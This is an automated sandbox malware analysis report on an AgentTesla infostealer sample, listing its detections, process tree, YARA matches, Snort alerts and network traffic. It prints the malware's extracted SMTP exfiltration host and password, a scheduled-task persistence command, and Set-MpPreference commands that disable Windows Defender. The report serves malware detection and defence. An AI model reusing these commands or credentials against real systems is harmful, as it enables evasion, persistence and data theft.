
Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Analysis ID:756116
MD5:fe1aa7fa995970ebb34465d5dc0d8ce1
SHA1:7505b261cc9df8c6ab8f10e035cf8d8319043cdb
SHA256:655b12a219d0f0e39a84fe44483e25411be852ce2bb0d451a1cb1a9a670f70b8
Tags: AgentTesla, exe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • nrQtAokXKaSn.exe (PID: 5976 cmdline: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe MD5: FE1AA7FA995970EBB34465D5DC0D8CE1)
    • schtasks.exe (PID: 1372 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nrQtAokXKaSn.exe (PID: 2744 cmdline: {path} MD5: FE1AA7FA995970EBB34465D5DC0D8CE1)
    • nrQtAokXKaSn.exe (PID: 1008 cmdline: {path} MD5: FE1AA7FA995970EBB34465D5DC0D8CE1)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}
Source | Rule | Description | Author | Strings
0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
      • 0x31cca:$a13: get_DnsResolver
      • 0x303f4:$a20: get_LastAccessed
      • 0x326d7:$a27: set_InternalServerPort
      • 0x32a20:$a30: set_GuidMasterKey
      • 0x30506:$a33: get_Clipboard
      • 0x30514:$a34: get_Keyboard
      • 0x318b5:$a35: get_ShiftKeyDown
      • 0x318c6:$a36: get_AltKeyDown
      • 0x30521:$a37: get_Password
      • 0x31010:$a38: get_PasswordHash
      • 0x3210b:$a39: get_DefaultCredentials
0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(13 entries in total; the remaining entries are not shown)

Source | Rule | Description | Author | Strings
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
              • 0x32bcc:$s10: logins
              • 0x3264c:$s11: credential
              • 0x2e906:$g1: get_Clipboard
              • 0x2e914:$g2: get_Keyboard
              • 0x2e921:$g3: get_Password
              • 0x2fca5:$g4: get_CtrlKeyDown
              • 0x2fcb5:$g5: get_ShiftKeyDown
              • 0x2fcc6:$g6: get_AltKeyDown
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
              • 0x300ca:$a13: get_DnsResolver
              • 0x2e7f4:$a20: get_LastAccessed
              • 0x30ad7:$a27: set_InternalServerPort
              • 0x30e20:$a30: set_GuidMasterKey
              • 0x2e906:$a33: get_Clipboard
              • 0x2e914:$a34: get_Keyboard
              • 0x2fcb5:$a35: get_ShiftKeyDown
              • 0x2fcc6:$a36: get_AltKeyDown
              • 0x2e921:$a37: get_Password
              • 0x2f410:$a38: get_PasswordHash
              • 0x3050b:$a39: get_DefaultCredentials
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack | INDICATOR_SUSPICIOUS_DisableWinDefender | Detects executables containing artifacts associated with disabling Windows Defender | ditekSHen
              • 0x29ecc:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
              • 0x29f10:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x29f58:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x2a1e4:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
              • 0x2a248:$s2: Set-MpPreference -DisableArchiveScanning $true
              • 0x2a2a0:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
              • 0x2a2f8:$s4: Set-MpPreference -DisableScriptScanning $true
              • 0x2a344:$s5: Set-MpPreference -SubmitSamplesConsent 2
              • 0x2a384:$s6: Set-MpPreference -MAPSReporting 0
              • 0x2a3d0:$s7: Set-MpPreference -HighThreatDefaultAction 6
              • 0x2a428:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
              • 0x2a478:$s9: Set-MpPreference -LowThreatDefaultAction 6
              • 0x2a4c8:$s10: Set-MpPreference -SevereThreatDefaultAction 6
(13 entries in total; the remaining entries are not shown)

              Persistence and Installation Behavior

              Source: Process started
              Author: Joe Security
              Data:
                Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
                CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
                CommandLine|base64offset|contains: *j
                Image: C:\Windows\SysWOW64\schtasks.exe
                NewProcessName: C:\Windows\SysWOW64\schtasks.exe
                OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
                ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                ParentProcessId: 4580
                ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
                ProcessId: 5756
                ProcessName: schtasks.exe

              Snort alert
              Timestamp: 11/29/22-16:51:24.449797
              Source IP: 192.168.2.6
              Destination IP: 111.118.212.38
              Source Port: 49717
              Destination Port: 587
              SID: 2030171
              Protocol: TCP
              Classtype: A Network Trojan was detected

              Snort alert
              Timestamp: 11/29/22-16:52:18.188399
              Source IP: 192.168.2.6
              Destination IP: 111.118.212.38
              Source Port: 49722
              Destination Port: 587
              SID: 2030171
              Protocol: TCP
              Classtype: A Network Trojan was detected


              AV Detection

              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | ReversingLabs: Detection: 31%
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | ReversingLabs: Detection: 31%
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Joe Sandbox ML: detected
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknown | HTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: vaoPXhU.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, nrQtAokXKaSn.exe.0.dr

              Networking

              Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49717 -> 111.118.212.38:587
              Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49722 -> 111.118.212.38:587
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | DNS query: name: api.ipify.org (repeated 6 times)
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | DNS query: name: api.ipify.org (repeated 6 times)
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | IP Address: 3.232.242.170
              Source: global traffic | HTTP traffic detected:
                GET / HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                Host: api.ipify.org
                Connection: Keep-Alive
              Source: global traffic | TCP traffic: 192.168.2.6:49717 -> 111.118.212.38:587
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
              Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://UrUbMY.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.strictfacilityservices.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://strictfacilityservices.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268958128.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268838022.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270302429.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270410317.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270179920.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270233958.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com%(
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272447141.0000000005A47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272325014.0000000005A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comB.TTF
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comE.TTF
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsd
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comasF;-
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomt
              Source: nrQtAokXKaSn.exe, 00000010.00000002.538774344.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539333299.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539499206.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://OPBeIPZ8XbJqLOvY6X.net
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
              Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.orgmail.strictfacilityservices.comaccounts
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
              Source: unknown | DNS traffic detected: queries for: api.ipify.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Host: api.ipify.org | Connection: Keep-Alive
